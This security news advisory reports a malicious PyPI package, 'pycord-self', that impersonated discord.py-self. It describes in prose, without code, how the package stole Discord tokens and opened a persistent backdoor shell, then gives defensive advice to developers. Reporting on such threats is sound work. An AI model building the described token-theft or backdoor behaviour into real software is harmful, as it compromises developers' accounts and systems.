Alert – Malicious PyPi Package Targets Discord Developers. Here is a quick look at what to know.

  • Home » Alert – Malicious PyPi Package Targets Discord Developers. Here is a quick look at what to know.
Discord
Featured News Latest News Latest Vulnerabilities Recommended News Security , , , ,

Alert – Malicious PyPi Package Targets Discord Developers. Here is a quick look at what to know.

A malicious package named ‘pycord-self’ has been discovered on the Python package index (PyPI). This package targets Discord developers to steal authentication tokens and plant a backdoor for remote control over the system. The package mimics the highly popular ‘discord.py-self,’ which has nearly 28 million downloads, and even offers the functionality of the legitimate project.

vulnerability-text-over-electronic-circuit-board-background Alert - Malicious PyPi Package Targets Discord Developers. Here is a quick look at what to know.

Official Package Overview

The official package is a Python library that allows communication with Discord’s user API and permits developers to control accounts programmatically. It is typically used for messaging and automating interactions, creating Discord bots, scripting automated moderation, notifications or responses, and running commands or retrieving data from Discord without a bot account.

Discovery and Impact

According to code security company Socket, the malicious package was added to PyPi last year in June and has been downloaded 885 times so far. At the time of writing, the package is still available on PyPI from a publisher that had its details verified by the platform. Socket researchers analyzed the malicious package and found that pycord-self contains code that performs two main things.

Token Theft and Backdoor Installation

First, it steals Discord authentication tokens from the victim and sends them to an external URL. Attackers can use the stolen token to hijack the developer’s Discord account without needing the access credentials, even if two-factor authentication protection is active. Second, the malicious package sets up a stealthy backdoor mechanism by creating a persistent connection to a remote server through port 6969. Depending on the operating system, it launches a shell (bash on Linux or cmd on Windows) that grants the attacker continuous access to the victim’s system.

Recommendations for Developers

Software developers are advised to avoid installing packages without checking that the code comes from the official author, especially if it’s a popular one. Verifying the name of the package can also lower the risk of falling victim to typosquatting. When working with open-source libraries, it is advisable to review the code for suspicious functions, if possible, and avoid anything that appears obfuscated. Additionally, scanning tools may help with detecting and blocking malicious packages.

Conclusion

This incident highlights the importance of vigilance when using open-source libraries and the need for developers to verify the authenticity of packages before installation. By taking these precautions, developers can protect themselves and their systems from potential threats.

You think you have a story worth everyone’s time? SUBMIT A STORY and we will publish it

Share this content:

Tag

Related Posts

Post Comment